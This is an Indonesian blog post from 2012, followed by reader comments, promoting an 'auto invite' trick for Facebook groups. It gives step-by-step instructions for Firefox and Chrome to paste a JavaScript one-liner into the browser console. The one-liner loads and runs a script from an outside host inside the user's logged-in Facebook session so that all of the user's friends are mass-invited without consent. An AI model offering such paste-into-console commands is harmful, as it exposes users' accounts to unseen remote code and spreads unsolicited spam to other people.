Pasang iklan Anda di sini.
http://goo.gl/ad3AU2
> > Cara Menambahkan Anggota Grup Facebook Secara Cepat

29 Cara Menambahkan Anggota Grup Facebook Secara Cepat

Rabu, Agustus 15, 2012
Cara Menambahkan Anggota Grup Facebook Secara Cepat | Cirebon-Cyber4rt - Setelah kemarin sempat geger dengan munculnya Script buat jail di facebook, yaitu Script Blank Grup/Script Maho yang membuat post pada grup facebook hilang ga berbekas, Sekarang ada script jail buat facebook lagi nih, tapi kayanya script ini sudah lama muncul deh. Tapi apa salahnya kalo saya share lagi buat pembelajaran.

http://cirebon-cyber4rt.blogspot.com/2012/08/cara-menambahkan-anggota-grup-facebook.html
Auto Invite Friends to Facebook Group 2012

Nama Scriptnya Auto Invite Group 2012, fungsinya adalah untuk mengundang semua teman facebook kalian ke dalam grup facebook yang kalian kelola.

Ok Deh, langsung aja kita mulai cara Cara Menambahkan Anggota Grup Facebook Secara Cepat, tutorialnya kita simak bersama-sama.

Pada Browser Mozilla Firefox :
  1. Buka link ini Grup Contoh
  2. Tekan tombol  Ctrl + Shift + K
  3. Lalu isi kolom yang tersedia dengan link code berikut :
document.body.appendChild(document.createElement('script')).src='http://duniamaya1.wap.sh/autoinvite2012';
    
     4.  Screenshotnya :
http://cirebon-cyber4rt.blogspot.com/2012/08/cara-menambahkan-anggota-grup-facebook.html
       
     5.  Kemudian tekan Enter.

Pada Browser Google Chrome :
  1. Klik kanan,
  2. Pilih Inspect Element, Lalu pilih Console.
  3. Kemudian isi kolom pada Console dengan code berikut :
document.body.appendChild(document.createElement('script')).src='http://duniamaya1.wap.sh/autoinvite2012';

     4.  Screenshotnya :
http://cirebon-cyber4rt.blogspot.com/2012/08/cara-menambahkan-anggota-grup-facebook.html

     5.  Kemudian tekan Enter.

Jika sudah menekan Enter, tunggu beberapa saat hingga teman yang ada difriendlist kalian masuk kedalam grup. Lama tidaknya tergantung jumlah teman facebook kalian, kalo temannya banyak ya lama, tapi kalo temannya cuma sedikit akan lebih cepat :D

Gunakan ini dengan bijak, jangan asal invite orang sembarangan tanpa meminta izin terlebih dahulu. Nanti kaya saya, dimarahin orang penghuni facebook wkwkw =D Maaf ya kawan.

Ok, Sekian dulu postingan saya sore kali ini tentang Cara Menambahkan Anggota Grup Facebook Secara Cepat, semoga dapat bermanfaat, Wassalam.



Artikel Terkait :

29 komentar:

Ska Blogger mengatakan...

illegarl, nginvite semua temen entah tau ato gak wkwkkw ngeriiii =))

Fadhiil Rachman mengatakan...

Ini kak video tutorialnya http://www.youtube.com/watch?v=N9ud_k4kT-Y
Kodenya http://blog.fadhiilrachman.net/2012/08/auto-invite-semua-teman-ke-grup-2012.html
Jangan lupa visit http://blog.fadhiilrachman.net/ sun duyu ahh emmahh :*
Wkwkwkkkabuurrrr XD

Cirebon-Cyber4rt mengatakan...

Ska Blogger : hehehe ilegal kayanya terlalu kejam gan :D

Fadiil Rachman: ok, gan... menuju tkp :D

Boriel Cyber mengatakan...

wah banyak info nih sob... makasih infonya

Asis Sugianto mengatakan...

wah perlu nih sobat, kebetulan sy punyabeberapa grop facebook sobat...

Cirebon-Cyber4rt mengatakan...

Boriel Cyber: sama-sama sob :D

Asis Sugianto: wkwkw silahkan sob, gunakan dngn bijak ya :D

Anonim mengatakan...

gan ane gk isa tekan ctrl shif k

Aldio Blog mengatakan...

langsung dicoba dulu :)

Cirebon-Cyber4rt mengatakan...

Anonim: diane bisa kok, emng ente pake web browsernya apa?

Aldio Blog: silahkan gan :)

i-Habibi mengatakan...

makasih infony gan, gabung juga ya di grup.ku
https://www.facebook.com/groups/blgwrld/

acifer mengatakan...

bang harus buat grup dulu...apa ngak usah...

Cirebon-Cyber4rt mengatakan...

i-Habibi: ok, nanti saya sempatkan kesana :)

Acifer: iya, harus buat grup dulu...

iskandar eby mengatakan...

mantap gan wkwkwkwkwkw geli saya ampe XD

Indramayu Cyber Team mengatakan...

iyah nih, banyak korban berceceran wkwkwk =))

yovan lutfi arya mengatakan...

sangat bermanfaat, thanks ya !!!

Fadlan Ramadlan mengatakan...

Nice info sob , kunjungan pertama :)

N-stars mengatakan...

Kunjungan Balik Ya Bro .. ^_^

Lucky HNC mengatakan...

wah artikel yg bermanfaat cocok buat nambah anggota group FB gw, thank's ea Gan ?

Galih-Achmad24 mengatakan...

GAK KENAK SEKARANG KAK .....

Ahmad mengatakan...

Tanpa cara curang itu pun sebenarnya grup Facebook sudah beraroma sampah (spam). Lihat artikel Aroma Busuk Spamming dari Grup Facebook. Dengan menggunakan cara cepat di atas, hati-hati saja, cap spammer bisa cepat melekat pada Anda.

Anonim mengatakan...

....
hahahaha...
ane jg kena marah min..
tapi lanjut aj..

:D

Algo Zali Aishiteru mengatakan...

Asyik juga kayaknya sob,,
haha
klo dimarahin biarin aja kayak orang linglung, nanti juga diem sendiri,,

Anonim mengatakan...

wkwkwk bner boss ak sring dmrain
tpi ahirnya mreka sneng dengan liat isi grup aku xicixi
min tpi aq lgi pkek hp neh bsa gak ad cra lain gtu uff

PariyadiMht mengatakan...

gan kalau script invite anggota group lain ke group kita ada gak?

Anonim mengatakan...

gan koq gk berhasil yaa ? nunggunya lama bngt, tapi gk nambah 1pun ;(

Mohammad Haris mengatakan...

terima kasih gan

numpang promo gan grup jalan jalan murah

https://www.facebook.com/groups/236333573176375/

Cabak23 mengatakan...

hehe kalau yang buat ngelike ada gak ya

zIdOtA TheMrbktB74 mengatakan...

ngga bisa gann .. ??

Anonim mengatakan...

Gak Bisa Broo

Poskan Komentar

Contact

Nama

Email *

Pesan *